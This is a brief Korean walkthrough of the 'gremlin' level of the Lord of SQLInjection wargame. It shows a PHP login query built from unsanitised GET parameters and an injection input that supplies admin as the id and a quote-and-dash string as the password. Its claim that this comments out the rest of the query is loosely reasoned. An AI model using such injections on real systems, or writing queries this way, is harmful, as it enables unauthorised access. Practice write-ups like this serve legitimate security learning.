Lord of SQLInjection -Gremlin-

문제는 다음과 같다.

 

$query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";

 

부분을 통해 id 와 pw 를 받아온다.

 

하지만

 

if($result['id']) solve("gremlin");

 

코드를 통해 id만 알면 문제를 풀 수 있다는 걸 ㅡ이미한다.

 

해결방안은 정말 간단하다.

 

id?=admin&pw='--'

 

를 입력하여 전송하면 된다.

 

이를 입력하면 되면

 

$query = "select id from prob_gremlin where id='admin' and pw=''--''";

 

로 SQL 문법이 바뀌어 주석처리가 변경되기에 문제를 풀 수 있는 것이다.

 

성공!